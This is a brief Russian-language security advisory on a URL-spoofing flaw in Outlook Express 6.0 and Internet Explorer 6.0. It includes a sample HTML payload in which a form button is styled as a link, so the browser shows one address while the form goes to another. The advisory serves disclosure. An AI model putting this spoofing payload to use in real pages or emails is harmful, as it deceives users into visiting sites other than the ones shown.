Программа: Microsoft Outlook Express 6.0 и Microsoft Internet Explorer 6.0 

Уязвимость обнаружена в Microsoft Outlook Express и Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTML с внедренной ссылкой, которая подменит другой URL и заставит браузер отобразить неправильный URL. 

Пример: 

<A href=»http://[apparent destination]»>
<FORM action=[actual destination] method=get>
<INPUT style=»BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt;
BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;
TEXT-DECORATION: underline» type=submit value=http://[apparent
destination]>
</A>



Оставить мнение